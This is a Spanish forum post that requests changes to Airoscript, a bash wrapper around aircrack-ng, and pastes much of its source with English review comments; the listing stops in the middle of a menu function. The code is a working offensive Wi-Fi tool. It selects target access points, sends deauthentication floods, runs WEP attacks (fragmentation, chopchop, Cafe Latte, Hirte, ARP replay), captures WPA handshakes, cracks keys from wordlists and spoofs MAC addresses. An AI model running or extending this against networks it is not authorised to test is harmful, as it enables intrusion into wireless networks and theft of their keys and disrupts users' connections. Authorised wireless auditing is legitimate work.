bueno , esto tal vez te de guerra solo 5 minutos....

quiero lo siguiente.
1-cuando lanzamos un ataque, el sistema de autentificacion por defecto es el standard... y, por ejemplo, las ralink se ahogan bastante; sin embargo he observado que en la opcion 6 o 7 (no recuerdo), la de autentificar, si usamos conservador... todo va de cine y las ralink no se caen en la asociacion, pueden hacer fragmentacion, chop-chop y de todo.
asi que me gustaria que por defecto se usara la de conservador , y la estandar llamarla "agresiva" , eliminando la "progresiva".
2-eliminar lo de montar en monitor segun driver compat , otro driver etc ....seamos realistas
airmon-ng start
le importa un pijo el driver , por no decir que el stack compat-wireless es el standard
quiero,...
seleccionar interfaz wlanx, y que la monte en monitor directamente; y si elijo monx, que pase al menu de opciones sin poner en monitor, obviamente.
resumido , saltarse la parte de montar en monitor, que esta fuera de lugar.
------
la parte de autentificacion... yo directamente habia modificado y eliminado incluso el menu ese... y dejado por defecto el modo conservador, sin opciones de cambio, ya que aunque va mas despacito, es muchisimo mas seguro y viable.
he tenido un ralink 3070 6 horas seguidas autentificando sin caerse,,..antes no duraba ni 2 minutos con el modo standard.
te pego mi code ...aunque ya te digo , me gustaria haber conservado la opcion standard pero llamarla agresiva ya que va bastante mas a saco.
[spoiler]#! /bin/bash
# Program: Airoscript
# Version: sw2.2 beta 7
# Authors: Base Code by Daouid
# Mods & Tweaks by CurioCT and others
# Traducción y mejoras añadidas realizadas Por Chinitiw, elmanuvolador, alist3r y USUARIONUEVO para Seguridad Wireless
# Credits: Hirte, Befa, Stouf, Mister_X, ASPj , Andrea, Pilotsnipes, darkAudax, Atheros support thx to green-freq
#
# Version of aircrack-ng required: AIRCRACK-NG 1.1
# Dependencies: aircrack-ng, xterm, grep, awk, macchanger, drivers capable of injection, mdk3 (optional)
# Start from an empty screen.
clear

## GLOBAL VARS
# Debug switch ("0" here); the upstream note describes it as letting every
# xterm window stay on screen after the operation inside it has finished.
DEBUG=0

## PATHS TO BINARIES
# PCMCIA control tool (upstream note: on 2.4 kernels it is cardctl).
CARDCTL=pccardctl
# DHCP client utility.
DHCPSOFT=dhcpcd

## PATH TO FILES AND FOLDERS
# NOTE(review): every path below lives under /root, so the script presumably
# runs as root - confirm. Recovered keys and captures are written here, so
# these folders should stay private to that account.
# Recovered keys are stored here.
KEYS=/root/swireless/airoscript/keys
# Captured data is stored here (the folder must already exist).
DUMP_PATH=/root/swireless/airoscript/capturas
# Forged ARP packets are stored here (same folder as the captures).
ARP_PATH=/root/swireless/airoscript/capturas
# Temporary wordlist file used for the WPA and WEP dictionary steps.
WORDLIST_FOLDER=/root/swireless/airoscript/wordlist
WORDLIST_PATH="${WORDLIST_FOLDER}/wordlist"

## AIRCRACK FINE-TUNING
# Packets injected per second.
INJECTRATE=350
# Number of times the deauth step is run.
DEAUTHTIME=5
# Time between re-associations with the target AP.
AUTHDELAY=200
KEEPALIVE=120
# Fudge factor setting.
FUDGEFACTOR=2

# Addresses used when an ARP packet is generated from a xor file
# (fragmentation and chopchop paths).
Host_IP=192.168.1.1
Client_IP=192.168.1.33
# Addresses used by the fragmentation step itself.
FRAG_HOST_IP=192.168.1.1
FRAG_CLIENT_IP=192.168.1.37
## ---8<---8<--- DONT EDIT ANYTHING PAST THIS LINE
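# Print the main menu below the interface/target summary.
# Calls:   target (prints the summary first)
# Outputs: menu text on stdout
menu() {
  target
  # Entry 8 is written as a normal one-line item like its neighbours; in the
  # pasted listing its number was missing and the string spanned three lines.
  printf '%s\n' \
    "MENU PRINCIPAL" \
    " " \
    " 1) Escanear -Buscar Objetivos " \
    " 2) Seleccionar -Seleccionar Objetivo " \
    " 3) Ataques -Atacar Objetivo " \
    " 4) Auditar -Menu Auditar " \
    " 5) Auto -Buscar Key Automaticamente " \
    " 6) Desautenticar -Desautenticar del Objetivo " \
    " 7) Inyección -Menu de Inyección " \
    " 8) Opciones Avanzadas -Utilidades Varias " \
    " 9) Salir -Cerrar Airoscript " \
    ""
}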
# Detect the X screen size and load the matching xterm geometry preset.
# Globals: detectedresolution (written)
# Calls:   resA..resE
# Outputs: progress text and the detected size on stdout
setresolution() {
  printf '%s' "Autodetectando Resolución..."
  # Third space-separated token of the "dimensions:" line of screen #0.
  detectedresolution=$(xdpyinfo | grep -A 3 "screen #0" | grep dimensions | tr -s " " | cut -d" " -f 3)
  echo $detectedresolution
  # 1024x600 is handled by the default arm: resA is also the fallback for
  # any size that is not listed.
  case "$detectedresolution" in
    1024x768) resB ;;
    1280x768 | 1366x768) resC ;;
    1280x1024) resD ;;
    1600x1200) resE ;;
    *) resA ;;
  esac
}
# xterm geometry preset that setresolution selects for 1024x600 and as its
# fallback. Each value is a complete "-geometry" option pair; the +0/-0
# offsets pin a window to a screen corner.
resA() {
  # windows pinned to the left edge
  TOPLEFT='-geometry 90x13+0+0'
  BOTTOMLEFT='-geometry 90x24+0-0'
  TOPLEFTBIG='-geometry 91x42+0+0'
  # windows pinned to the right edge
  TOPRIGHT='-geometry 83x26-0+0'
  BOTTOMRIGHT='-geometry 75x12-0-0'
  TOPRIGHTBIG='-geometry 83x26-0+0'
}
# xterm geometry preset that setresolution selects for 1024x768.
resB() {
  # windows pinned to the left edge
  TOPLEFT='-geometry 92x14+0+0'
  BOTTOMLEFT='-geometry 92x36+0-0'
  TOPLEFTBIG='-geometry 100x52+0+0'
  # windows pinned to the right edge
  TOPRIGHT='-geometry 68x25-0+0'
  BOTTOMRIGHT='-geometry 74x20-0-0'
  TOPRIGHTBIG='-geometry 74x30-0+0'
}
# xterm geometry preset that setresolution selects for 1280x768 and 1366x768.
resC() {
  # windows pinned to the left edge
  TOPLEFT='-geometry 100x20+0+0'
  BOTTOMLEFT='-geometry 100x30+0-0'
  TOPLEFTBIG='-geometry 100x52+0+0'
  # windows pinned to the right edge
  TOPRIGHT='-geometry 109x20-0+0'
  BOTTOMRIGHT='-geometry 109x20-0-0'
  TOPRIGHTBIG='-geometry 109x30-0+0'
}
# xterm geometry preset that setresolution selects for 1280x1024.
resD() {
  # windows pinned to the left edge
  TOPLEFT='-geometry 110x35+0+0'
  BOTTOMLEFT='-geometry 110x35+0-0'
  TOPLEFTBIG='-geometry 110x72+0+0'
  # windows pinned to the right edge
  TOPRIGHT='-geometry 99x40-0+0'
  BOTTOMRIGHT='-geometry 99x30-0-0'
  TOPRIGHTBIG='-geometry 99x40-0+0'
}
# xterm geometry preset that setresolution selects for 1600x1200.
resE() {
  # windows pinned to the left edge
  TOPLEFT='-geometry 130x43+0+0'
  BOTTOMLEFT='-geometry 130x40+0-0'
  TOPLEFTBIG='-geometry 130x85+0+0'
  # windows pinned to the right edge
  TOPRIGHT='-geometry 68x25-0+0'
  BOTTOMRIGHT='-geometry 132x35-0-0'
  TOPRIGHTBIG='-geometry 132x48-0+0'
}
# Run "airmon-ng check" for the active interface in an xterm, then go back to
# the options menu.
# Globals: WIFI (read)
# Calls:   optionmenu
airmoncheck() {
  # Not backgrounded: the menu returns only after the xterm has closed.
  xterm -e airmon-ng check $WIFI
  printf '\n'
  optionmenu
}
# Tune the active interface to the target's channel.
# Globals: WIFI, Host_CHAN (read)
monitor_interface2() {
  # Both expansions stay unquoted as in the original: word splitting removes
  # the padding that Host_CHAN can carry (target strips it with tr as well).
  iwconfig $WIFI channel $Host_CHAN
}
# Let the operator pick a network interface (only when WIFI2 is still empty),
# hand over to the mode-specific handler, then redraw the main menu.
# Globals: INTERFACES, WIFI2, WIFI2MODE, foo (written)
# Calls:   mode / modeManaged / modeMonitor (via the dispatch below),
#          detectarmac, info, menu
function setinterface {
# Names taken from `ip link`; `grep -v lo` drops every name containing "lo".
INTERFACES=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 |awk {'print $1'} |grep -v lo`
if [ "$WIFI2" = "" ]
then
echo "Selecciona una interface: "
echo ""
# $INTERFACES must stay unquoted: select needs one word per interface.
select WIFI2 in $INTERFACES; do
break;
done
sleep 1
# Value after "Mode:" in the iwconfig output for the chosen interface.
WIFI2MODE=$(iwconfig $WIFI2 | grep Mode | awk '{print $1,$4,$3}' | awk 'BEGIN { FS = ":" } ; { print $2}' | awk '{print $1}')
# Dynamic dispatch: the function name is "mode" + the parsed value, e.g.
# modeManaged or modeMonitor; an empty value calls mode (the retry prompt).
# NOTE(review): any other value names a function that this part of the file
# does not define - confirm the possible iwconfig mode strings.
mode$WIFI2MODE
# This line holds only redirections and runs no command.
>&1 > /dev/null
detectarmac
info
else
# Placeholder so the else branch is not empty.
foo=foo
fi
clear
menu
}
# Retry handler: setinterface calls "mode$WIFI2MODE", so this runs when no
# mode string was parsed for the chosen interface.
# Calls: setinterface (asks again)
mode() {
  printf '%s\n' "Interface no válida, elige de nuevo"
  sleep 2
  setinterface
}
# Shown when the chosen interface reports Managed mode: asks whether to switch
# it to monitor mode and with which driver family.
# Calls: drivers-compat, drivers-madwifi, drivers-otros, modeMonitor
modeManaged() {
  while :; do
    clear
    printf '%s\n' \
      "AVISO" \
      "" \
      " Interface en modo managed " \
      " Desea activar modo monitor? " \
      " " \
      " 1) Si (compat wireless) " \
      " 2) Si (Atheros madwifi) " \
      " 3) Si (otros drivers) " \
      " 4) No " \
      " "
    printf '%s' " #> "
    read yn
    clear
    # Any other answer prints the hint and shows the menu again.
    case "$yn" in
      1) drivers-compat; break ;;
      2) drivers-madwifi; break ;;
      3) drivers-otros; break ;;
      4) modeMonitor; break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
}
# Use the chosen interface as it is (no mode change) and record its chipset
# and driver as reported by airmon-ng.
# Globals: WIFI2 (read); TYPE, DRIVER, WIFI (written)
modeMonitor() {
  # Column 2 of the matching airmon-ng row, cut at the first "-".
  TYPE=$(airmon-ng | grep $WIFI2 | awk '{print $2}' | cut -d "-" -f1)
  # Columns 3 and 5 of the same row, cut at the first "[".
  DRIVER=$(airmon-ng | grep $WIFI2 | awk '{print $3,$5}' | cut -d "[" -f1)
  WIFI=$WIFI2
}
# Put the chosen interface into monitor mode with "airmon-ng start" and adopt
# the interface name that airmon-ng reports back.
# Globals: WIFI2 (read); AIROUTPUT, TYPE, DRIVER, tmpwifi, WIFI (written)
drivers-compat() {
  # Row for WIFI2 plus the line after it, ignoring "running" process lines.
  AIROUTPUT=$(airmon-ng start $WIFI2 | grep -v "running" | grep -A1 $WIFI2)
  ## echo $AIROUTPUT > airoutputdebug.txt
  TYPE=$(airmon-ng | grep $WIFI2 | awk '{print $2}' | cut -d "-" -f1)
  DRIVER=$(airmon-ng | grep $WIFI2 | awk '{print $3,$5}' | cut -d "[" -f1)
  # Last word of the flattened output, up to its first ")".
  # NOTE(review): this depends on the exact airmon-ng message layout - confirm
  # against the airmon-ng version in use.
  tmpwifi=$(echo \"$AIROUTPUT\" | awk {'print $NF'} | cut -d ")" -f1)
  WIFI=$tmpwifi
}
# Monitor-mode path for "other drivers": start monitor mode, keep the same
# interface name, then kill the processes airmon-ng reports as running.
# Globals: WIFI2 (read); AIROUTPUT, TYPE, DRIVER, WIFI, proceso (written)
drivers-otros() {
  AIROUTPUT=$(airmon-ng start $WIFI2 | grep -v "running" | grep -A1 $WIFI2)
  TYPE=$(echo \"$AIROUTPUT\" | grep monitor | awk '{print $2}')
  DRIVER=$(echo \"$AIROUTPUT\" | grep monitor | awk '{print $3}')
  WIFI=$WIFI2
  echo Buscando y matando procesos conflictivos que controlen $WIFI2"..."
  # NOTE(review): the fourth space-separated token of each "running" line is
  # handed straight to kill -9 without checking that it is a PID; a changed
  # airmon-ng output format would send arbitrary tokens to kill.
  for proceso in $(airmon-ng check $WIFI2 | grep running | cut -d " " -f 4); do
    kill -9 $proceso
    echo $proceso
  done
}
# Monitor-mode path for Atheros madwifi: destroy the VAP, reload ath_pci with
# autocreate=monitor, then kill the processes airmon-ng reports as running.
# Globals: WIFI2 (read); WIFI, TYPE, DRIVER, proceso (written)
drivers-madwifi() {
  wlanconfig $WIFI2 destroy
  modprobe -r ath_pci
  modprobe ath_pci autocreate=monitor
  # First column of the airmon-ng row that mentions "parent".
  WIFI=$(airmon-ng | grep parent | awk '{print $1}')
  TYPE=$(airmon-ng | grep $WIFI2 | awk '{print $2}')
  DRIVER=$(airmon-ng | grep $WIFI2 | awk '{print $3}')
  echo Buscando y matando procesos conflictivos que controlen $WIFI2"..."
  # NOTE(review): tokens parsed from the tool output go to kill -9 unchecked.
  for proceso in $(airmon-ng check $WIFI2 | grep running | cut -d " " -f 4); do
    kill -9 $proceso
    echo $proceso
  done
}
# Read the interface's current MAC from macchanger and use it as the source
# address for later commands.
# Globals: WIFI (read); realmac, FAKE_MAC (written)
detectarmac() {
  # Third field of the "Current" line printed by `macchanger -s`.
  realmac=$(macchanger -s $WIFI | grep "Current" | awk '{ print $3 }')
  FAKE_MAC=$realmac
}
# Print the interface summary and refresh the cached mode / vendor values.
# Globals: WIFI, WIFI2, Host_MAC, TYPE, DRIVER, FAKE_MAC (read);
#          WIFIMODE, WIFI2MODE, Host_MAC_info1, Host_MAC_MODEL (written)
# Outputs: summary block on stdout
info() {
  # Interface mode (managed/monitor): the value after "Mode:" in iwconfig.
  WIFIMODE=$(iwconfig $WIFI | grep Mode | awk '{print $1,$4,$3}' | awk 'BEGIN { FS = ":" } ; { print $2}' | awk '{print $1}')
  WIFI2MODE=$(iwconfig $WIFI2 | grep Mode | awk '{print $1,$4,$3}' | awk 'BEGIN { FS = ":" } ; { print $2}' | awk '{print $1}')
  # AP model: first three octets of the target MAC, looked up in the vendor
  # list printed by `macchanger -l`.
  Host_MAC_info1=$(echo $Host_MAC | awk 'BEGIN { FS = ":" } ; { print $1":"$2":"$3}')
  Host_MAC_MODEL=$(macchanger -l | grep $Host_MAC_info1 | awk '{ print "("$5,$6,$7")" }')
  printf '%s\n' \
    "INFO INTERFAZ" \
    "" \
    " Interfaz = $WIFI / modo $WIFIMODE" \
    " Chipset/Driver = $TYPE $DRIVER" \
    " Tu MAC = $FAKE_MAC" \
    ""
}
# This is another great contribution from CurioCT that allows you to manually enter SSID if none is set
# Ask whether to type a replacement SSID when the detected one is unusable.
# Globals: Host_SSID (cleared on "No", set by Host_ssidinput on "Si")
# Calls:   Host_ssidinput
blankssid() {
  while :; do
    clear
    printf '%s\n' \
      "SSID INCORRECTO DETECTADO" \
      "" \
      " Desea introducir uno nuevo " \
      " 1) Si " \
      " 2) No " \
      " "
    printf '%s' " #> "
    read yn
    case "$yn" in
      1) Host_ssidinput; break ;;
      2) Host_SSID=""; break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# This is the input part of previous function
# Prompt for an SSID and store what the operator types.
# Globals: Host_SSID (written)
Host_ssidinput() {
  printf '%s\n' " "
  printf '%s' " Introduce el SSID >"
  read Host_SSID
  # Only resets this function's own positional parameters; nothing reads them.
  set -- ${Host_SSID}
  clear
}
# This is the function to select Target from a list
## MAJOR CREDITS TO: Befa , MY MASTER, I have an ALTAR dedicated to him in my living room
## And HIRTE for making all those great patch and fixing the SSID issue
# List the access points found in the scan CSV and store the operator's pick
# in the Host_* variables.
# Globals: DUMP_PATH, AdvancedESSIDFilter (read);
#          Host_IDL, Host_SPEED, Host_ENC, Host_MAC, Host_CHAN, Host_SSID and
#          the helper arrays assid/achannel/amac/aprivacy/aspeed (written)
# Files:   reads $DUMP_PATH/dump-01.csv, rewrites $DUMP_PATH/dump-02.csv
# NOTE(review): every CSV field, the ESSID in particular, is data announced by
# nearby access points, i.e. untrusted input. It is printed with `echo -e`
# and unquoted, so backslash sequences inside a network name are interpreted
# and glob characters are expanded; printf '%s' with quoted arguments would
# print the value literally.
function Parseforap {
clear
# Show a banner only while a display filter is set.
case $AdvancedESSIDFilter in
"" ) ;;
* ) echo -e "AVISO: Filtro de pantalla por ESSID activado. Patrón filtrado:" $AdvancedESSIDFilter;
echo -e "Puedes desactivar el filtro en Opciones Avanzadas";;
esac
ap_array=`cat $DUMP_PATH/dump-01.csv | grep -a -n Station | awk -F : '{print $1}'`
# find, inside the CSV, the line where the AP list ends and the list of connected clients begins
# NOTE(review): with an empty filter the unquoted expansion vanishes and "-"
# is taken as the grep pattern - confirm this is what keeps every AP row.
head -n $ap_array $DUMP_PATH/dump-01.csv | grep -a $AdvancedESSIDFilter - &> $DUMP_PATH/dump-02.csv
# keep only the AP list for the arrays below, discarding the client list
tabs -n 6
echo " Listado de APs Objetivo"
echo ""
echo -e " #\tMAC CN\t SEG\t\t PWR\t #PAQ\t SSID"
echo ""
i=0
# One comma-separated record per line; rows whose first field is shorter than
# 17 characters (a full MAC address) are skipped.
while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do
longueur=${#MAC}
if [ $longueur -ge 17 ]; then
i=$(($i+1))
echo -e " "$i")\t"$MAC" "$CHANNEL"\t"$PRIVACY" \t"$POWER"\t"$IDLENGTH"\t"$ESSID
# Plain assignment, not indexed by $i: only the last row's value is kept.
aidlenght=$IDLENGTH
assid[$i]="$ESSID" # these quotes are part of the fix for SSIDs that contain spaces.
achannel[$i]=$CHANNEL
amac[$i]=$MAC
aprivacy[$i]=$PRIVACY
aspeed[$i]=$SPEED
fi
done < $DUMP_PATH/dump-02.csv
echo ""
echo -n " Selecciona Objetivo> "
# NOTE(review): choice is not validated; an empty or out-of-range answer
# leaves the Host_* values empty.
read choice
idlenght=${aidlenght[$choice]}
ssid=${assid[$choice]}
channel=${achannel[$choice]}
mac=${amac[$choice]}
privacy=${aprivacy[$choice]}
speed=${aspeed[$choice]}
# NOTE(review): "idlength" here and in the arithmetic below is a different
# name from "idlenght" above and is not assigned in this function, so
# Host_IDL stays empty and fin equals the SSID length unless idlength is set
# elsewhere. The substring below then only drops the first character of the
# field; changing the spelling would change that result - verify before
# touching it.
Host_IDL=$idlength
Host_SPEED=$speed
Host_ENC=$privacy
Host_MAC=$mac
Host_CHAN=$channel
acouper=${#ssid}
fin=$(($acouper-idlength))
Host_SSID=${ssid:1:fin}
}
# Ask which encryption type the scan should be filtered by.
# Globals: ENCRYPT (written; empty means no filter)
choosetype() {
  while :; do
    clear
    printf '%s\n' \
      "SELECCIONA MODO DE BÚSQUEDA" \
      " " \
      " 1) Sin filtros " \
      " 2) OPN " \
      " 3) WEP " \
      " 4) WPA " \
      " 5) WPA2 " \
      " 6) WPA y WPA2 " \
      " "
    printf '%s' " #> "
    read yn
    case "$yn" in
      1) ENCRYPT=""; break ;;
      2) ENCRYPT="OPN"; break ;;
      3) ENCRYPT="WEP"; break ;;
      4) ENCRYPT="WPA1"; break ;;
      5) ENCRYPT="WPA2"; break ;;
      6) ENCRYPT="WPA"; break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Prompt for the SSID pattern used to filter the target selection screen.
# Globals: AdvancedESSIDFilter (written; empty disables the filter)
# NOTE(review): Parseforap passes this value to grep unquoted, so it is read
# as a grep pattern and is subject to word splitting.
SetAdvancedESSIDFilter() {
  clear
  printf '%s\n' \
    "INTRODUCE FILTRO DE DISPLAY" \
    "" \
    " Introduce patrón para filtrar " \
    " las redes por SSID. Ejemplos: " \
    " " \
    " * WLAN_ " \
    " * Vodafone " \
    " * ONO " \
    " * Tele2 " \
    " " \
    " (En blanco para desactivar) " \
    " " \
    " NOTA: El filtrado se aplica solo" \
    " en la pantalla de selección de " \
    " objetivo, no durante la captura " \
    " "
  printf '%s' " Patrón >"
  read AdvancedESSIDFilter
  # Only resets this function's own positional parameters.
  set -- ${AdvancedESSIDFilter}
  clear
}
# Ask whether to scan every channel or only selected ones.
# Calls: Scan, Scanchan
choosescan() {
  while :; do
    clear
    printf '%s\n' \
      "SELECCIONA CANAL" \
      " " \
      " 1) Todos los canales " \
      " 2) Canal(es) específico(s) " \
      " "
    printf '%s' " #> "
    read yn
    printf '\n'
    case "$yn" in
      1) Scan; break ;;
      2) Scanchan; break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Ask whether a client of the chosen AP should be selected as well.
# Calls: askclientsel, Host_ssidinput, choosetarget (again after an SSID fix)
choosetarget() {
  while :; do
    clear
    printf '%s\n' \
      "¿SELECCIONAR UN CLIENTE?" \
      " " \
      " 1) Si " \
      " 2) No " \
      " 3) Corregir el SSID Primero " \
      " "
    printf '%s' " #> "
    read yn
    case "$yn" in
      1) askclientsel; break ;;
      2) break ;;
      # The question is asked again only if the SSID prompt succeeded.
      3) Host_ssidinput && choosetarget; break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Ask which station the deauthentication step should address.
# Calls: deauthall, deauthfake, deauthclient, inputmactodeauth
choosedeauth() {
  while :; do
    clear
    printf '%s\n' \
      "¿A QUIÉN DESAUTENTICAR?" \
      " " \
      " 1) A todos " \
      " 2) A mí mismo " \
      " 3) Al cliente seleccionado " \
      " 4) A otra dirección MAC " \
      " "
    printf '%s' " #> "
    read yn
    case "$yn" in
      1) deauthall; break ;;
      2) deauthfake; break ;;
      3) deauthclient; break ;;
      4) inputmactodeauth; break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Prompt for a MAC address and start the deauth window for it.
# Globals: MANUAL_MAC2 (written); HOLD, TOPRIGHT, Host_SSID, DEAUTHTIME,
#          Host_MAC, WIFI (read)
# NOTE(review): the typed value is not checked for MAC syntax and is expanded
# unquoted, so extra words typed here become extra aireplay-ng arguments.
inputmactodeauth() {
  printf '%s' "Teclea la MAC a desautenticar del AP >"
  read MANUAL_MAC2
  xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" \
    -title "Desautenticando a $MANUAL_MAC2 de $Host_SSID" \
    -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC -c $MANUAL_MAC2 $WIFI &
}
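# Menu for the WEP paths; dispatches to the function behind the chosen entry.
# Calls: attack, fakeinteractiveattack, fragnoclient, chopchopattack,
#        cafelatteattack, hirteattack, attackclient, interactiveattack,
#        fragmentationattack, fragmentationattackclient, chopchopattackclient,
#        pskarp
attackwep() {
  while true; do
    clear
    # Entry 8 is printed as a normal one-line item; in the pasted listing its
    # number was missing and the string spanned three lines, although the
    # case arm for 8 exists below.
    printf '%s\n' \
      "ATAQUES SIN CLIENTES" \
      " " \
      " 1) Falsa auth => Automatica " \
      " 2) Falsa auth => Interactiva " \
      " 3) Fragmentation " \
      " 4) Chopchop " \
      " 5) Cafe Latte " \
      " 6) Hirte " \
      " " \
      "ATAQUES USANDO UN CLIENTE" \
      " " \
      " 7) ARP replay => Automatico " \
      " 8) ARP replay => Interactivo " \
      " 9) Fragmentation " \
      " 10) Frag. attack con cliente " \
      " 11) Chopchop " \
      " " \
      "INYECCIÓN SI SE GENERA EL XOR" \
      " " \
      " 12) ARP inject desde xor (PSK) " \
      " 13) Volver al menu Principal " \
      " "
    printf '%s' " #> "
    read -r yn
    echo ""
    case "$yn" in
      1) attack; break ;;
      2) fakeinteractiveattack; break ;;
      3) fragnoclient; break ;;
      4) chopchopattack; break ;;
      5) cafelatteattack; break ;;
      6) hirteattack; break ;;
      7) attackclient; break ;;
      8) interactiveattack; break ;;
      9) fragmentationattack; break ;;
      10) fragmentationattackclient; break ;;
      11) chopchopattackclient; break ;;
      12) pskarp; break ;;
      13) break ;;
      *) echo "Opción desconocida. Elije de nuevo" ;;
    esac
  done
  clear
}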
# Tell the operator that the selected network is open, pause, clear.
attackopn() {
  clear
  printf '%s\n' " " " La red seleccionada es abierta " ""
  sleep 3
  clear
}
# Report that the target's security type has no handler in witchattack.
# Globals: Host_ENC (read)
attackunknown() {
  clear
  printf '%s\n' \
    " " \
    " La red seleccionada posee una " \
    " seguridad no implementada: $Host_ENC "
  sleep 3
  clear
}
# Ask where the client MAC should come from.
# Calls: listclients, clientdetectandchoose, clientinput
askclientsel() {
  while :; do
    clear
    printf '%s\n' \
      "SELECCIONA EL CLIENTE" \
      " " \
      " 1) Clientes detectados del AP objetivo" \
      " 2) Clientes detectados de todos los APs" \
      " 3) Realizar desaut. masiva al AP objetivo + redetectar sus clientes" \
      " 4) Introducir manualmente MAC de un cliente" \
      " "
    printf '%s' " #> "
    read yn
    printf '\n'
    case "$yn" in
      1) listclients fromtarjetap; break ;;
      2) listclients fromallaps; break ;;
      3) clientdetectandchoose; break ;;
      4) clientinput; break ;;
      *) printf '%s\n' "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Prompt for a client MAC address typed by hand.
# Globals: Client_MAC (written; stored as typed, no format check)
clientinput() {
  clear
  printf '%s\n' " "
  printf '%s' " Teclea la mac del cliente >"
  read Client_MAC
  # Only resets this function's own positional parameters.
  set -- ${Client_MAC}
}
# Build a list of client MACs from a capture CSV and let the operator pick.
# Arguments: $1 - fromtarjetap | fromallaps | fromclientdetection
# Globals:   DUMP_PATH, Host_MAC (read); HOST, CLIENT (written);
#            Client_MAC (written and exported)
listclients() {
  case "$1" in
    fromtarjetap)
      echo "Listando clientes del AP objetivo..."
      # First column of every row mentioning the target, minus the target's
      # own row and rows containing 00:00:00:00.
      HOST=$(cat $DUMP_PATH/dump-01.csv | grep -a $Host_MAC | awk '{ print $1 }' | grep -a -v 00:00:00:00 | grep -v $Host_MAC)
      ;;
    fromallaps)
      echo "Listando clientes de todos los APs detectads..."
      HOST=$(cat $DUMP_PATH/dump-01.csv | grep -a "0.:..:..:..:.." | awk '{ print $1 }' | grep -a -v 00:00:00:00)
      ;;
    fromclientdetection)
      echo "Listando clientes del AP objetivo despues de una desautenticación masiva..."
      HOST=$(cat $DUMP_PATH/$Host_MAC-01.csv | grep -a $Host_MAC | awk '{ print $1 }' | grep -a -v 00:00:00:00 | grep -a -v $Host_MAC)
      ;;
  esac
  clear
  printf '%s\n' "SELECCIONA CLIENTE" ""
  # $HOST stays unquoted so that select gets one word per client.
  select CLIENT in $HOST; do
    # The CSV column still carries its trailing comma; keep the part before it.
    export Client_MAC=$(echo $CLIENT | awk '{ split($1, info, ","); print info[1] }')
    break
  done
  clear
}
# Reset the wireless card: stop capture/injection tools, take the interface
# down, eject and re-insert the card, start monitor mode again, then return
# to the options menu.
# Globals: WIFI, WIFI2, CARDCTL (read)
# Calls:   optionmenu
cleanup() {
  # Backgrounded, so the steps below do not wait for killall to finish.
  killall -9 aireplay-ng airodump-ng > /dev/null &
  ifconfig $WIFI down
  airmon-ng stop $WIFI
  clear
  sleep 2
  $CARDCTL eject
  sleep 2
  $CARDCTL insert
  airmon-ng start $WIFI2
  ifconfig $WIFI up
  iwconfig $WIFI
  optionmenu
}
# Print the interface summary and, once a target is selected, the target AP
# summary.
# Globals: Host_MAC, Host_SSID, Host_ENC, Host_MAC_MODEL, Client_MAC (read);
#          Host_CHAN, Host_SPEED (read, rewritten without spaces)
# Calls:   info
target() {
  clear
  info
  # No target yet: stop after the interface block (status 0, as before).
  [[ -n "$Host_MAC" ]] || return 0
  Host_CHAN=$(echo $Host_CHAN | tr -d " ")
  Host_SPEED=$(echo $Host_SPEED | tr -d " ")
  printf '%s\n' \
    "INFO AP OBJETIVO" \
    "" \
    " SSID = $Host_SSID /$Host_ENC" \
    " Canal = $Host_CHAN" \
    " Velocidad = $Host_SPEED Mbps" \
    " MAC del AP = $Host_MAC $Host_MAC_MODEL" \
    " MAC de cliente = $Client_MAC" \
    ""
}
# Run aircrack-ng (WEP mode) on the target's capture and pull the key out of
# its saved output.
# Globals: Host_MAC, DUMP_PATH (read); KEY (written)
# Files:   writes $DUMP_PATH/$Host_MAC.key
configure() {
  aircrack-ng -a 1 -b $Host_MAC -s -0 -z $DUMP_PATH/$Host_MAC-01.cap \
    &> $DUMP_PATH/$Host_MAC.key
  # Fourth field of the line(s) containing "KEY".
  KEY=$(cat $DUMP_PATH/$Host_MAC.key | grep KEY | awk '{ print $4 }')
}
# Run aircrack-ng (WPA mode) with the wordlist in $WORDLIST on the target's
# capture and pull the key out of its saved output.
# Globals: Host_MAC, DUMP_PATH, WORDLIST (read); KEY (written)
# Files:   writes $DUMP_PATH/$Host_MAC.key
wpaconfigure() {
  aircrack-ng -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $WORDLIST \
    &> $DUMP_PATH/$Host_MAC.key
  # Fourth field of the line(s) containing "KEY".
  KEY=$(cat $DUMP_PATH/$Host_MAC.key | grep KEY | awk '{ print $4 }')
}
# Pick the key-recovery menu that matches the target's encryption.
# Globals: Host_ENC (read)
# Calls:   crack (WEP), wpacrack (everything else)
witchcrack() {
  # $Host_ENC is deliberately left unquoted, as in the original: word
  # splitting strips padding around the value, and an empty value makes `[`
  # print an error and fall through to the else branch.
  if [ $Host_ENC = "WEP" ]; then
    crack
  else
    wpacrack
  fi
}
# Dispatch on the target's encryption type.
# Globals: Host_ENC (read)
# Calls:   monitor_interface2 + attackwep (WEP),
#          monitor_interface2 + wpahandshake (WPA2 / WPA / WPA2WPA),
#          attackopn (OPN), attackunknown (anything else)
witchattack() {
  # $Host_ENC stays unquoted on purpose: splitting strips padding, while an
  # empty or multi-word value makes `[` fail, so that test counts as false.
  if [ $Host_ENC = "WEP" ]; then
    monitor_interface2
    attackwep
  elif [ $Host_ENC = "WPA2" ] || [ $Host_ENC = "WPA" ] || [ $Host_ENC = "WPA2WPA" ]; then
    monitor_interface2
    wpahandshake
  elif [ $Host_ENC = "OPN" ]; then
    attackopn
  else
    attackunknown
  fi
}
# Ask how the interface MAC should be changed.
# Calls: randommacchanger, clientmacchanger, inputmacchanger
wichchangemac() {
  while :; do
    clear
    printf '%s\n' \
      " " \
      " Cambiar la MAC... " \
      " " \
      " 1) Por una aleatoria " \
      " 2) Por cliente seleccionado " \
      " 3) Introducir MAC " \
      " "
